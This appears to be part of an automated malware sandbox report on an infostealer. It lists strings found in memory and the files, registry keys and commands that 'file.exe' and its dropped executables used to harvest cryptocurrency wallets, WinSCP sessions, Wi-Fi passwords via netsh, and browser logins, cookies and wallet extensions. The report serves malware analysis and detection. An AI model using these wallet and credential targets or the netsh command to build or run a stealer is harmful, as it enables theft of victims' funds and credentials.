Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: passphrase.json
Source: file.exe, 00000000.00000002.1988015001.00000000009DE000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8C6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Binance
Source: file.exe, 00000000.00000002.1988015001.00000000009DE000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1988015001.00000000009DE000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
